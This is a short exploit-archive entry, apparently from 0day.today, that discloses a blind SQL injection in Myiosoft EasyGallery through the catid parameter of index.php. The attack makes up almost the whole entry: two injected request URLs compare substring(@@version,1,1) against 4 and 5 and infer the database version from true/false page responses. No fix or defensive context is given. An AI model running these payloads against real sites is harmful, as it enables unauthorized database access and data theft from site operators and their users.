id: 10539
date: 12/31/2009
title: Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability
author: Hussin X
cves: 

==============================================================
Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability
==============================================================

___________________________________
 
 
script  : http://myiosoft.com/?1.105.0.0
 
Exploit :
_______
true & false
 
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=4  > false
 
http://server/easygallery/index.php?PageSection=0&page=category&catid=22+and+substring(@@version,1,1)=5  > true



#  0day.today [2023-03-24]  #